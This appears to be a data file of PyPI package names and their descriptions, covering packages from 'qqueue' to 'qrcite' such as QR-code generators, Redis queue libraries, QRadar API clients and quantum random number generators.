+{"package": "qqueue", "pacakge-description": "qqueuequick queue"}
+{"package": "qqutils", "pacakge-description": "qqutilsCollection of reusable python functions."}
+{"package": "qqweibo", "pacakge-description": "UNKNOWN"}
+{"package": "qqwry", "pacakge-description": "QQWry is a binary file which contains ip-related locations information."}
+{"package": "qqwry-linux-python3", "pacakge-description": "qqwry-linux-python3A tool for automatically updating qqwry.dat on Linux. Installation: pip3 install qqwry-linux-python3 Updating qqwry.dat. How it works: the latest zip package URL is taken from the WeChat official-account article at https://mp.weixin.qq.com/mp/appmsgalbum?__biz=Mzg3Mzc0NTA3NA==&action=getalbum&album_id=2329805780276838401 and downloaded; the zip URL looks like https://www.cz88.net/soft/H50VASDc3-2023-06-21.zip; unzipping the zip yields setup.exe, and unpacking setup.exe yields qqwry.dat. Code:>>>fromqqwry.srcimportUpdateQQwry>>>uq=UpdateQQwry('./qqwry.dat')>>>uq.update()/usr/local/bin/innoextractisvalidhttps://www.cz88.net/soft/H50VASDc3-2023-06-21.zipDownloading...https://www.cz88.net/soft/H50VASDc3-2023-06-21.zipDownloadcompletedcopy/tmp/app/qqwry.datto/root/.nali/qqwry.datcompletedTrue Using qqwry.dat:>>>fromqqwry.srcimportQQwry>>>qw=QQwry()>>>qw.load_file('./qqwry.dat')True>>>print(qw.lookup('8.8.8.8'))('\u7f8e\u56fd\u52a0\u5229\u798f\u5c3c\u4e9a\u5dde\u5723\u514b\u62c9\u62c9\u53bf\u5c71\u666f\u5e02','\u8c37\u6b4c\u516c\u53f8DNS\u670d\u52a1\u5668')"}
+{"package": "qqwry-py2", "pacakge-description": "Looks up the location of an IP address in qqwry.dat.\nIt also provides a small tool that updates qqwry.dat from Chunzhen Network. This is the Python 2.7 implementation of the qqwry-py3 module; the documentation is the same as for that module: https://pypi.org/project/qqwry-py3/"}
+{"package": "qqwry-py3", "pacakge-description": "Looks up the location of an IP address in qqwry.dat, and also provides a small tool that updates qqwry.dat from Chunzhen Network (cz88.net). The package is on PyPI; install it with: pip install qqwry-py3 Featuresfor Python 3.0+.Provide two sets of implementations for selection. One finds faster, but loads slowly and takes up more memory.The query speed on i3 3.6GHz and Python 3.6 is 180,000 times per second.Provide a small tool to update qqwry.dat from Chunzhen Network (cz88.net), see the last part of this article for usage.usage>>> from qqwry import QQwry\n>>> q = QQwry()\n>>> q.load_file('qqwry.dat')\n>>> q.lookup('8.8.8.8')\n('United States','Google DNS server in Mountain View, Santa Clara County, California')Explain the q.load_file(filename, loadindex=False) functionLoad the qqwry.dat file. Return True on success, False on failure.The parameter filename can be the file name of qqwry.dat (str type), or the file content of bytes type.When the parameter loadindex=False (default parameter):Program behavior: read the entire file into memory, search from itLoading speed: very fast, 0.004 secondsProcess memory: less, 16.9 MBQuery speed: slower, 53,000 times per secondSuggestions for use: suitable for desktop programs, large, medium and small websitesWhen the parameter loadindex=True:Program behavior: Read the entire file into memory. Load an additional index, read the index into a faster data structureLoading speed: \u2605\u2605\u2605Very slow, because of the additional loading index, 0.78 seconds\u2605\u2605\u2605Process memory: more, 22.0 MBQuery speed: faster, 180,000 times per secondRecommendations for use: only suitable for high-load servers(The above is the data when i3 3.6GHz, Win10, Python 3.6.2 64bit, qqwry.dat 8.86MB)Explain the q.lookup('8.8.8.8') functionIf found, return a tuple containing two strings, such as: ('country', 'province')If no result is found, a None is returnedExplain the q.clear() functionClear the loaded qqwry.datIt is not necessary to execute q.clear() when calling load_file againExplain the q.is_loaded() functionWhether the q object has loaded data, return True or FalseExplain the q.get_lastone() functionReturn the last piece of data, the last piece is usually the version number of the dataReturn None if there is no data>>> q.get_lastone()\n('\u7eaf\u771f\u7f51\u7edc', '2020\u5e749\u670830\u65e5IP\u6570\u636e')The small tool for updating qqwry.dat from Chunzhen Network (cz88.net)>>> from qqwry import updateQQwry\n>>> ret = updateQQwry(filename)When the parameter filename is of type str, it indicates the name of the file to be saved.Upon success, it returns a positive integer, which is the number of bytes in the file;Upon failure, it returns a negative integer.When the parameter filename is None, the function directly returns the content of the qqwry.dat file (a bytes object).Return a bytes object on success; return a negative integer on failure. Here you need to check whether the type of the return value is bytes or int.Errors represented by negative integers:-1: An error occurred while downloading copywrite.rar-2: Error when parsing copywrite.rar-3: An error occurred when downloading qqwry.rar-4: qqwry.rar file size does not match the data of copywrite.rar-5: Error when decompressing qqwry.rar-6: An error occurred while saving to the final file"}
+{"package": "qr", "pacakge-description": "Full documentation (with example code) is at (http://github.com/tnm/qr/)QRQR helps you create and work with queue, capped collection (bounded queue),\ndeque, and stack data structures for Redis. Redis is well-suited for\nimplementations of these abstract data structures, and QR makes it even easier to\nwork with the structures in Python.Quick SetupYou'll need Redis (http://github.com/antirez/redis/) itself (QR makes use\nof MULTI/EXEC, so you'll need the Git edge version), and the current Python interface\nfor Redis, redis-py, (http://github.com/andymccurdy/redis-py).
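Once Redis and redis-py are in place, typical use is a few lines per data structure. The sketch below is illustrative only: the Queue class name comes from the project README, but the exact constructor arguments, the companion Stack/Deque/CappedCollection classes and the pop ordering are assumptions rather than verified behaviour.
>>> from qr import Queue        # Stack, Deque and CappedCollection are assumed to follow the same pattern
>>> q = Queue('work_items')     # name of the Redis key backing the queue; connection details assumed to default to a local Redis
>>> q.push('job-1')             # append an element to the queue
>>> q.push('job-2')
>>> q.pop()                     # remove an element from the other end (FIFO ordering assumed)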
Putqr.pyin your PYTHONPATH and you\u2019re all set."} +{"package": "qr2022", "pacakge-description": "No description available on PyPI."} +{"package": "qr2cnc", "pacakge-description": "UNKNOWN"} +{"package": "qr2scad", "pacakge-description": "qr2scad package"} +{"package": "qr2text", "pacakge-description": "Convert SVG images containing barcodes generated by PyQRCode to ASCII art,\nfor displaying in a terminal.Because I\u2019m a weird person who reads mail using Mutt over SSH in a terminal,\nand sometimes people send me QR codes for setting up TOTP authentication.Example:$ python3\n>>> import pyqrcode\n>>> qr = pyqrcode.create('Hello world!')\n>>> qr.svg('hello.svg')\n\n$ qr2text --white-background hello.svg\n\n\n \u2588\u2580\u2580\u2580\u2580\u2580\u2588 \u2580\u2584\u2588\u2584\u2580\u2584\u2580\u2580\u2584 \u2588\u2580\u2580\u2580\u2580\u2580\u2588\n \u2588 \u2588\u2588\u2588 \u2588 \u2580 \u2588\u2584 \u2588 \u2588 \u2588\u2588\u2588 \u2588\n \u2588 \u2580\u2580\u2580 \u2588 \u2580\u2580\u2584\u2584\u2580 \u2580 \u2584 \u2588 \u2580\u2580\u2580 \u2588\n \u2580\u2580\u2580\u2580\u2580\u2580\u2580 \u2588\u2584\u2588\u2584\u2580\u2584\u2580\u2584\u2580 \u2580\u2580\u2580\u2580\u2580\u2580\u2580\n \u2584\u2584\u2584\u2584\u2580\u2580 \u2584\u2580\u2584\u2580\u2588\u2588\u2580\u2580\u2580 \u2580\u2584\u2588\u2584\u2580 \u2580\n \u2580\u2580\u2580\u2580\u2580\u2584\u2580\u2580\u2584\u2580\u2584\u2580\u2584 \u2580\u2580\u2588\u2580\u2584 \u2580\u2588 \u2588\u2588\n \u2584\u2588\u2580\u2584\u2580 \u2580\u2580\u2584 \u2584\u2588\u2588\u2584\u2580 \u2580\u2584 \u2588\u2584 \u2580\n \u2588 \u2584 \u2580\u2580\u2580\u2588\u2584 \u2588\u2588\u2580\u2588\u2580\u2588\u2588\u2580\u2588\u2584\u2580\u2588\n \u2580 \u2580 \u2580\u2580\u2580\u2584\u2588\u2584\u2580\u2584\u2588\u2580\u2580\u2588\u2580\u2580\u2580\u2588\u2588\u2588 \u2584\n \u2588\u2580\u2580\u2580\u2580\u2580\u2588 \u2584 \u2588\u2580\u2584\u2580\u2588\u2588 \u2580 \u2588 \u2588\n \u2588 \u2588\u2588\u2588 \u2588 \u2588\u2580\u2584 \u2584 \u2580\u2580\u2588\u2580\u2580\u2580\u2588\u2580\u2584\n \u2588 \u2580\u2580\u2580 \u2588 \u2584\u2580\u2580\u2580\u2580 \u2580 \u2584\u2588\u2584\u2588 \u2588\n \u2580\u2580\u2580\u2580\u2580\u2580\u2580 \u2580 \u2580\u2580 \u2580\u2580 \u2580 \u2580 \u2580\n\n\nHello world!Note: you may have to tell qr2text whether your terminal is black-on-white\n(\u2013white-background) or white-on-black (\u2013black-background). 
Some QR code\nscanners don\u2019t care, but others will refuse to recognize inverted QR codes.Note: for QR code decoding to work you need to have libzbar installed on your\nsystem (e.g.sudo apt install libzbar0on Ubuntu).Synopsis:usage: qr2text [-h] [--version] [--black-background] [--white-background]\n [--big] [--trim] [--pad PAD] [--decode] [--no-decode]\n [--encode-text ENCODE_TEXT]\n [filename ...]\n\nConvert PyQRCode SVG images to ASCII art\n\npositional arguments:\n filename SVG file with the QR code (use - for stdin)\n\noptions:\n -h, --help show this help message and exit\n --version show program's version number and exit\n --black-background terminal is white on black (default)\n --white-background, --invert\n terminal is black on white\n --big use full unicode blocks instead of half blocks\n --trim remove empty border\n --pad PAD pad with empty border\n --decode decode the QR codes (default if libzbar is available)\n --no-decode don't decode the QR codes\n --encode-text ENCODE_TEXT\n generate a QR code with given text"} +{"package": "qr3", "pacakge-description": "Full documentation (with example code) is athttp://github.com/doctorondemand/qr3QR3QR3helps you create and work withqueue, capped collection (bounded queue),\ndeque, and stackdata structures forRedis. Redis is well-suited for\nimplementations of these abstract data structures, and QR3 makes it even easier to\nwork with the structures in Python.Quick SetupYou\u2019ll need [Redis](http://github.com/antirez/redis/\u201cRedis\u201d) itself (QR makes use\nof MULTI/EXEC, so you\u2019ll need the Git edge version), and the current Python interface\nfor Redis, [redis-py](http://github.com/andymccurdy/redis-py\u201credis-py\u201d).Run setup.py to install qr3 or \u2018pip install qr3\u2019.Responding to PR\u2019sGiven that this package primarily supports internal use cases, we cannot guarantee a\nspecific response time on PRs for new features. However, we will do our best to\nconsider them in a timely fashion.We do commit to reviewing anything related to a security issue in a timely manner.\nWe ask that you first submit anything of that nature tosecurity@doctorondemand.comprior to creating a PR and follow responsible disclosure rules.Thanks for your interest in helping with this package!"} +{"package": "qradar4py", "pacakge-description": "QRadar API Client written in PythonThis is a wrapper around the REST-API of QRadar. 
This includes some undocumented endpoints, that may not work as expected.All the information for the various endpoints were pulled from version13.1.If you find any bugs please open an issue or a pull request.A word of warningqradar4py is work in progress and should be treated as a software in beta, especially regarding the \"undocumented\" API endpoints.Installationsudopip3installqradar4py# ORcdqradar4py&&sudopython3setup.pyinstallUsageJust a very basic sample on how to get the IDs of up to 10 offenses that are not closed.fromqradar4py.apiimportQRadarApi# Initalize the API with the URL, your API token and whether the certificate should be checked.api=QRadarApi(\"\",\"\",version='13.1',verify=True)# Get all offensesstatus_code,response=api.siem.get_offenses(filter='status != CLOSED',Range='items=0-50',fields='id')print(status_code,response)# 200 [{'id': 1}, {'id': 2}, {'id': 3}, {'id': 4}, {'id': 5}]MappingCheck the \"Interactive API\" on QRadar to see what endpoints are available in your version.Check thedocumentationto get a mapping from endpoint to method.DisclaimerI am in no way affiliated with IBM.QRadar is a registered trademark by IBM."} +{"package": "qradar-api", "pacakge-description": "qradar-apiThis package contains an object oriented approach to the QRadar API. The idea is to keep the logic simple, structure and allow for an easy way to integrate with the QRadar API.This package was inspired by:https://github.com/ryukisec/qradar4pywho already put in some ground work when it came to an object oriented approach.\nThis package goes further and adds models for the different object you can retrieve and post.It is a work in progress though :)Structurethe package containsEndpointsInherit from base classQRadarAPIClientUse decorators to define which headers and parameters are allowed for each endpointlocated in src\\qradar\\api\\endpointsModelsInherit from base classQRadarModel, which provides them with a custom__repr__andfrom_json()factoryLocated in src\\qradar\\modelsInstallationsudopip3installqradar-apiHow to useRoadmapSet up decent packaging :package:Fix typing for ease-of-useImplement all models & GET endpoints :rocket:Implement all post endpoints :pencil:Convince IBM to contribute when creating a new API version :pray:Write a nice set of unit tests :clown_face:"} +{"package": "qradial-menu", "pacakge-description": "No description available on PyPI."} +{"package": "qrainbowstyle", "pacakge-description": "QRainbowStyle is a fully customizable stylesheet for Python and Qt applications.This module provides a function to load pre-compiled stylesheets. 
To generate your own\nstyle based on custom color palette clone package from project homepage.qrainbowstyle.windows module adds frameless windows and message boxes.\nFrom version v0.8 module supports native Windows calls.\nFeatures:Borders snappingMinimize, restore, close animationsSize grips on bordersFrame shadowAero shakeOn Linux and Darwin qrainbowstyle will load class with its own implementation of these features.\nDue to a bug in Qt, window minimizing is not supported on MacOS.First, start importing our moduleimportqrainbowstyleThen you can get stylesheet provided by QRainbowStyle for various Qt wrappers\nas shown below# PySide2stylesheet=qrainbowstyle.load_stylesheet_pyside2(style='oceanic')# PyQt5stylesheet=qrainbowstyle.load_stylesheet_pyqt5(style='oceanic')Alternatively, from environment variables provided by QtPy, Qt.Py# QtPystylesheet=qrainbowstyle.load_stylesheet(style='oceanic')# Qt.Pystylesheet=qrainbowstyle.load_stylesheet(style='oceanic',qt_api=Qt.__binding__)Finally, set your QApplication with itapp.setStyleSheet(stylesheet)To load frameless window in your app import both qrainbowstyle and qrainbowstyle.windows modulesimportqrainbowstyleimportqrainbowstyle.windowsInitialize qt app and load choosen stylesheet.\nNext, create instances of frameless window and your master widget with content you want to show.# Create app and load selected stylesheetapp=QtWidgets.QApplication(sys.argv)app.setStyleSheet(qrainbowstyle.load_stylesheet(style=\"oceanic\"))# Package options# qrainbowstyle.alignButtonsLeft() # align titlebar buttons to left side# qrainbowstyle.useDarwinButtons() # use darwin style buttonsqrainbowstyle.setAppName(\"My new application\")# set global name for application# qrainbowstyle.setAppIcon(\"icon.ico\") # set global app icon# Create frameless mainwindowwin=qrainbowstyle.windows.FramelessWindow()# Create content widget and pass reference to main windowwidget=MasterWidget(win)# Add widget to main window and show itwin.addContentWidget(widget)win.show()sys.exit(app.exec())Enjoy!"} +{"package": "qram", "pacakge-description": "No description available on PyPI."} +{"package": "qrand", "pacakge-description": "qrandA multiprotocol and multiplatform quantum random number generation frameworkRandom numbers are everywhere.Computer algorithms, data encryption, physical simulations, and even the arts use them all the time. There is one problem though: it turns out that they are actually very difficult to produce in large amounts. Classical computers can only implement mathematical tricks to emulate randomness, while measuring it out of physical processes turns out to be too slow. Luckily, the probabilistic nature of quantum computers makes these devices particularly useful for the task.QRAND is a free and open-source framework for quantum random number generation. Thanks to its loosely coupled design, it offers seamlessly compatibility between differentquantum computing platformsandQRNG protocols. Not only that, but it also enables the creation of custom cross-compatible protocols, and a wide range of output formats (e.g. 
bitstring, int, float, complex, hex, base64).To boost its efficiency, QRAND makes use of a concurrent cache to reduce the number of internet connections needed for random number generation; and for quality checks, it incorporates a suite of classical entropy validation tests which can be easily plugged into any base protocol.Additionally, QRAND introduces an interface layer forNumPythat enables the efficient production of quantum random numbers (QRN) adhering to a wide variety of probability distributions. This is ultimately accomplished by transforming uniform probability distributions produced in cloud-based real quantum hardware, through NumPy's random module.fromqrandimportQuantumBitGeneratorfromqrand.platformsimportQiskitPlatformfromqrand.protocolsimportHadamardProtocolfromnumpy.randomimportGeneratorfromqiskitimportIBMQprovider=IBMQ.load_account()platform=QiskitPlatform(provider)protocol=HadamardProtocol()bitgen=QuantumBitGenerator(platform,protocol)gen=Generator(bitgen)print(f\"Random Raw:{bitgen.random_raw()}\")print(f\"Random Bitstring:{bitgen.random_bitstring()}\")print(f\"Random Unsigned Int:{bitgen.random_uint()}\")print(f\"Random Double:{bitgen.random_double()}\")print(f\"Random Binomial:{gen.binomial(4,1/4)}\")print(f\"Random Exponential:{gen.exponential()}\")print(f\"Random Logistic:{gen.logistic()}\")print(f\"Random Poisson:{gen.poisson()}\")print(f\"Random Std. Normal:{gen.standard_normal()}\")print(f\"Random Triangular:{gen.triangular(-1,0,1)}\")# ...Supported quantum platformsAs of May 2021, onlyQiskitis supported. However, support forCirqandQ#is under active development.Implemented QRNG protocolsAs of May 2021, only the basicHadamardProtocolis available. We are also working on implementing thisEntaglementProtocol, as well as a version ofGoogle's Sycamore routine(patent permitting).Authors and citationQRAND is the work of many people who contribute to the project at\ndifferent levels. If you use QRAND, please cite as per the includedBibTeX file.Contribution guidelinesIf you'd like to contribute to QRAND, please take a look at thecontribution guidelines. This project adheres to the followingcode of conduct. By participating, you are expected to uphold this code.We useGitHub issuesfor tracking requests and bugs. Please use Unitary Fund'sDiscordfor discussion and simple questions.AcknowledgementsParts of this software's source code have been borrowed from theqRNGproject, which is licensed under theGNU GPLv3license. Copyright notice and specific changes can be found as a docstring wherever this applies.LicenseApache License 2.0(c) Copyright 2021 Pedro Rivero"} +{"package": "qrandom", "pacakge-description": "QrandomSelectionThis repository contains the source code of research paper titled: \" A generalized quantum algorithm for assuring fairness in random selection among 2nparticipants\". Research paper is published in SN Computer Science Springer Nature Journal, 14th march 2020.Paper Title: A Generalized Quantum Algorithm for Assuring Fairness in Random Selection Among 2NParticipantsAuthor:Ravin KumarPublication: 14th March 2020Publication Link:https://link.springer.com/article/10.1007/s42979-020-0091-zDoi:https://doi.org/10.1007/s42979-020-0091-zCite as:Kumar, R. A Generalized Quantum Algorithm for Assuring Fairness in Random Selection Among 2N Participants. \nSN COMPUT. SCI. 1, 86 (2020). 
https://doi.org/10.1007/s42979-020-0091-zQiskit Version:qiskit-terra version: 0.7.0qiskit-aqua version: 0.4.1Create quantum circuit for 'N' participantsOur module provides a direct method for creating quantum circuit for 'n' participants.importqrandomres=qrandom.select(8)### here 8 is total number of participants.Visualization of quantum circuitA simple method is given to save the pictorial repreentation of quantum circuit for 'n' participants.importqrandomchk=qrandom.vis_circuit(8,\"file_name.png\")### it saves the generalized quantum circuit for 8 participants in file_name.png file.Installing module using PyPi:pipinstallqrandomCopyright(c)2018RavinKumarWebsite:https://mr-ravin.github.ioPermissionisherebygranted,freeofcharge,toanypersonobtainingacopyofthissoftwareandassociateddocumentationfiles(the\u201cSoftware\u201d),todealintheSoftwarewithoutrestriction,includingwithoutlimitationtherightstouse,copy,modify,merge,publish,distribute,sublicense,and/orsellcopiesoftheSoftware,andtopermitpersonstowhomtheSoftwareisfurnishedtodoso,subjecttothefollowingconditions:TheabovecopyrightnoticeandthispermissionnoticeshallbeincludedinallcopiesorsubstantialportionsoftheSoftware.THESOFTWAREISPROVIDED\u201cASIS\u201d,WITHOUTWARRANTYOFANYKIND,EXPRESSORIMPLIED,INCLUDINGBUTNOTLIMITEDTOTHEWARRANTIESOFMERCHANTABILITY,FITNESSFORAPARTICULARPURPOSEANDNONINFRINGEMENT.INNOEVENTSHALLTHEAUTHORSORCOPYRIGHTHOLDERSBELIABLEFORANYCLAIM,DAMAGESOROTHERLIABILITY,WHETHERINANACTIONOFCONTRACT,TORTOROTHERWISE,ARISINGFROM,OUTOFORINCONNECTIONWITHTHESOFTWAREORTHEUSEOROTHERDEALINGSINTHESOFTWARE."} +{"package": "qrandom-NoahGWood", "pacakge-description": "QRandomRandom number generation using quantum computers.Right now the project is in its' infancy.WARNING: THIS PROGRAM SHOULD NOT BE CONSIDERED CRYPTOGRAPHICALLY RANDOM UNLESS CONNECTED TO A REAL QUANTUM PROCESSORThis is a basic example of how to use QRandomYou can import everythingfrom qrandom import *or just the QRandom module if you'd like to instantiate it yourselffrom qrandom import Qrandom\nx = QRandom()generate a random float between 0 and 1:print(random())\nprint(x.random())generate a random integer in rangeprint(randrange(0, 5))\nprint(x.randrange(0, 5))Generate a random number n bits long, defaults to integer outputprint(getrandbits(8))\nprint(x.getrandbits(8))You can also get the number in byte formatprint(getrandbits(8, x=\"bytes\"))"} +{"package": "q-random-number-generator", "pacakge-description": "q_random_number_generatorDescriptionUsing qiskit to realize quantum random number generator.Exampleimportq_randon_number_generatorasqrngrandom_int=qrng.randint(-10,10,1000)AuthorAllen Wu"} +{"package": "qrange", "pacakge-description": "qrangeA small, easy-to-use library for working with ranges.InstallationThis package can be installed with the command:pip install qrangeHow to useUse qrange in your project by adding the following line at the top of your file:import qrangeThis library provides a set of functions for making it easier to work with ranges:set_min_max(x, min_max, min_max_new): Takes anxthat's betweenmin_max[0]andmin_max[1], and changes the limits tomin_max_new[0]andmin_max_new[1]. Example usage:color=[128,0,0]color[0]=set_min_max(color[0],[0,255],[0,1])#converts 0-255 color to 0-1 color range.reverse_range(x, min_max): Reverses anxvalue in amin_maxrange. 
Suppose you have asoftnessvariable, but you made the program so that the higher the softness is, the harder it gets.reverse_rangecan fix that for you:softness=reverse_range(softness,[0,10])# If the variable was 0, this function made it 10.# similarly, if it had a value of 10, it is now 0.is_in_range(x, min_max, limits = ['c', 'c']): Checks if anxvalue is betweenmin_max[0]andmin_max[1]. The limits of the range are closed by default, so ifxis equal to one of them, the function returnsTrue. However, you can choose betweencando(closed/open) for each one of the two limits.\nAn example:isBetween=is_in_range(var,[25,75])range_lerp(min_max, t): Returns the linear interpolation betweenmin_max[0]andmin_max[1]. The following line prints the value halfway between 1 and 5:print(range_lerp([1,5],0.5))# outputs 3find_lerp(x, min_max): returns the correspondingtvalue (between 0 and 1) of anxvalue betweenmin_max[0]andmin_max[1]. Consider the following examples:print(find_lerp(5,[5,10]))#outputs 0print(find_lerp(10,[5,10]))#outputs 1print(find_lerp(8,[5,10]))#outputs 0.6clamp(x, min_max): Restricts the value to stay within the limitsmin_max[0]andmin_max[1].var=clamp(var,[25,75])ChangelogVersion 1.0.0qrange has been createdAbout the authorHi! I am a solo software developer. I createdqrangeas an open source library to simplify the process of using ranges in Python. Check out myother repositoriesas well.\nIf you want to support me, pleasebuy me a coffee here. Any amount is appreciated! :)"} +{"package": "qrangeslider", "pacakge-description": "QRangeSliderThu Apr 28 00:08:07 PDT 20111 OverviewThe QRangeSlider class implements a horizontal PyQt range slider widget.README this fileLICENSE the license under which QRangeSlider is releasedqrangeslider.py qrangeslider python moduleexamples.py some usage examples2 Installation$ sudo easy_install qrangeslideror download the source and run$ sudo python setup.py install3 Basic Usage>>> from qrangeslider import QRangeSlider\n>>> app = QtGui.QApplication(sys.argv)\n>>> slider = QRangeSlider()\n>>> slider.show()\n>>> app.exec_()"} +{"package": "qr-asterix", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrbill", "pacakge-description": "Python library to generate Swiss QR-billsFrom 2020, Swiss payment slips will progressively be converted to the\nQR-bill format.\nSpecifications can be found onhttps://www.paymentstandards.ch/This library is aimed to produce properly-formatted QR-bills as SVG files\neither from command line input or by using theQRBillclass.InstallationYou can easily install this library with:$ pip install qrbillCommand line usage exampleMinimal:$ qrbill --account \"CH5800791123000889012\" --creditor-name \"John Doe\"\n --creditor-postalcode 2501 --creditor-city \"Biel\"More complete:$ qrbill --account \"CH44 3199 9123 0008 8901 2\" --reference-number \"210000000003139471430009017\"\n--creditor-name \"Robert Schneider AG\" --creditor-street \"Rue du Lac 1268\"\n--creditor-postalcode \"2501\" --creditor-city \"Biel\"\n--additional-information \"Bill No. 
3139 for garden work and disposal of cuttings.\"\n--debtor-name \"Pia Rutschmann\" --debtor-street \"Marktgasse 28\" --debtor-postalcode \"9400\"\n--debtor-city \"Rorschach\" --language \"de\"For usage:$ qrbill -hIf no\u2013outputSVG file path is specified, the SVG file will be named after\nthe account and the current date/time and written in the current directory.Note that if you don\u2019t like the automatic line wrapping in the human-readable\npart of some address, you can replace a space by a newline sequence in the\ncreditor or debtor name, line1, line2, or street to force a line break in the\nprinted addresses.\n(e.g.\u2013creditor-street \u201cRue des Quatorze Contours du Cheminndu Creux du Van\u201d)\nThe data encoded in the QR bill willnothave the newline character. It will\nbe replaced by a regular space.Python usage example>>> from qrbill import QRBill\n>>> my_bill = QRBill(\n account='CH5800791123000889012',\n creditor={\n 'name': 'Jane', 'pcode': '1000', 'city': 'Lausanne', 'country': 'CH',\n },\n amount='22.45',\n )\n>>> my_bill.as_svg('/tmp/my_bill.svg')Outputting as PDF or bitmapIf you want to produce a PDF version of the resulting bill, we suggest using thesvglib library. It can be used on the\ncommand line with thesvg2pdfscript, or directly from Python:>>> import tempfile\n>>> from qrbill import QRBill\n>>> from svglib.svglib import svg2rlg\n>>> from reportlab.graphics import renderPDF\n\n>>> my_bill = QRBill(\n account='CH5800791123000889012',\n creditor={\n 'name': 'Jane', 'pcode': '1000', 'city': 'Lausanne', 'country': 'CH',\n },\n amount='22.45',\n )\n>>> with tempfile.TemporaryFile(encoding='utf-8', mode='r+') as temp:\n>>> my_bill.as_svg(temp)\n>>> temp.seek(0)\n>>> drawing = svg2rlg(temp)\n>>> renderPDF.drawToFile(drawing, \"file.pdf\")or to produce a bitmap image output:>>> from reportlab.graphics import renderPM\n>>> dpi = 300\n>>> drawing.scale(dpi/72, dpi/72)\n>>> renderPM.drawToFile(drawing, \"file.png\", fmt='PNG', dpi=dpi)Running testsYou can run tests either by executing:$ python tests/test_qrbill.pyor:$ python setup.py testSponsorsChangeLog1.1.0 (2023-12-16)Add Arial font name in addition to Helvetica for better font fallback on some\nsystems.Drop support for Python < 3.8, and add testing for Python 3.11 and 3.12.1.0.0 (2022-09-21)BREAKING: Removed thedue-datecommand line argument and thedue_dateQRBill init kwarg, as this field is no longer in the most recent specs (#84).Handle line breaks in additional information, so it is showing in the printed\nversion, but stripped from the QR data (#86).Improved performance by deactivating debug mode in svgwrite (#82).0.8.1 (2022-05-10)Fixed a regression where the currency was not visible in the payment part\n(#81).0.8.0 (2022-04-13)Replaced##with//as separator in additional informations (#75).Print scissors symbol on horizontal separation line when not in full page.\nWARNING: the resulting bill is 1 millimiter higher to be able to show the\nentire symbol (#65).Renamed--extra-infoscommand line parameter to--additional-informationand renamedextra_infosandref_numberQRBill.__init__arguments\ntoadditional_informationandreference_number, respectively.\nThe old arguments are still accepted but raise a deprecation warning (#68).0.7.1 (2022-03-07)Fixed bad position of amount rect on receipt part (#74).Increased title font size and section spacing on payment part.0.7.0 (2021-12-18)License changed from GPL to MIT (#72).Prevented separation line filled on some browsers.Scissors symbol is now an SVG path (#46).0.6.1 
(2021-05-01)Added--versioncommand-line option.QR-code size is now more in line with the specs, including the embedded Swiss\ncross (#58, #59).Widen space at the right of the QR-code (#57).A new--font-factorcommand-line option allows to scale the font if the\nactual size does not fit your needs (#55).0.6.0 (2021-02-11)Added the possibility to include newline sequences in name, street, line1, or\nline2 part of addresses to improve printed line wrapping of long lines.Moved QR-code and amount section to better comply with the style guide (#52).Dropped support for EOL Python 3.5 and confirmed support for Python 3.9.0.5.3 (2021-01-25)Enforced black as swiss cross background color.Allowed output with extension other than .svg (warning instead of error).Split long address lines to fit in available space (#48).0.5.2 (2020-11-17)Final creditor is only for future use, it was removed from command line\nparameters.Capitalized Helvetica font name in code (#43).The top line was printed a bit lower to be more visible (#42).0.5.1 (2020-08-19)Fix for missing country field in QR code when using CombinedAddress (#31).Added support for printing bill to full A4 format, using thefull_pageparameter ofQRBill.as_svg()or the CLI argument--full-page.The vertical separation line between receipt and main part can be omitted\nthrough the--no-payment-lineCLI argument.A new--textcommand line parameter allows for a raw text output.Support for Alternate procedures lines was added (--alt-procsargument,\n#40).0.5 (2020-06-24)QRBill.as_svg()accepts now file-like objects.Added support for combined address format.A top separation line is now printed by default. It can be deactivated\nthrough thetop_lineboolean parameter ofQRBill.__init__().The error correction level of the QR code conforms now to the spec (M).0.4 (2020-02-24)Changes were not logged until version 0.4. Development stage was still alpha."} +{"package": "qrbsgen", "pacakge-description": "DescriptionA Python library for encoding Quantum Rule Based Systems (QRBS). Calculate the probabilities associated with forward chaining rule bases using quantum gates and circuits.qrbsgensupports rule bases involvingAND,OR, andNOToperators.Made possible with an integration toQiskitSDK.PrerequisitesFamiliarity withQiskitis useful - check it outhere.The specification and definition of the QRBS implemented here can be found in the followingpublicationby V. Bonillo et al. and the wider NExt ApplicationS of Quantum Computing, orNEASQCproject.Installationpip install qrbsgenUsageSee the usage steps below to get started:import qrbsgen as q\n\n# Instantiate your QuantumRuleBasedSystem\nrule_system = q.QuantumRuleBasedSystem()\n\n# Define and add rules using appropriate syntax (see below)\nrule = \"IF ((A) AND ((B) OR (C))) THEN (R)\"\nrule_terms, qubits = rule_system.add_rules([rule])\n\n# Perform quantum circuit\nrule_system.evaluate_rules(rule_terms, qubits)Given the two-level system representing true or false outcomes, the probability of the above test will be a probabilistic result like so:* Added rule IF ((A) AND ((B) OR (C))) THEN (R)\n* Probability of outcome: 0.378SyntaxCurrently, QRBS is limited to supporting inputs of two-level systems, as can be easily mapped to a two-level quantum system, or qubit.This means clauses, or variables, must be defined astrueorfalse,oneorzero. 
You can also define variables asAandNOT Afor simplicity.Please define rules and clauses as follows:Start with an\"IF\"statement in capital letters.Follow with the rule antecedent and antecedent clauses, where\"IS\"is typed in capital letters where relevant e.g.:A IS one,A IS true,(A is true),Aor(A).Follow with a\"THEN\"statement in capital letters.Finish with the rule consequet, where\"IS\"is typed in capital letters where relevant e.g.:B IS one,B IS true,(B is true),Bor(B).\"IF ((A IS true) AND ((B IS true) OR (C IS true))) THEN (R IS true)\"ExamplesExamples can be foundhere.InformationCreated by Kate Marshall of IBM.Although this is copyright of IBM, this is not an official or unofficial IBM product.\nPlease get in touch for any further information:kate.marshall@ibm.com.Inspiration for this repo and rule parsing techniques came from theSimpfulfuzzy reasoning API."} +{"package": "qrcard", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qrc-build", "pacakge-description": "No description available on PyPI."} +{"package": "qrcericcommons", "pacakge-description": "qrcer_commonsCommon utils for python."} +{"package": "qrcgen", "pacakge-description": "UNKNOWN"} +{"package": "qrcite", "pacakge-description": "qrciteGenerate QR Codes from .bib-files or given dois.Example:Inspired byhttps://github.com/nucleic-acid/namedropR.Installationfrom pypihttps://pypi.org/project/qrcite/pip install qrcitefrom the git repositorypip install https://codeberg.org/Meph/qrciteUsage after installationqrcite input.bib\n\nqrcite -d \"\"\n\nqrcite --helpExamplesWith text, red backgroundqrcite inputfile.bib -c \"#900000\" -t pngQR Code only, as pdf, from doi onlypython -m qrcite -d 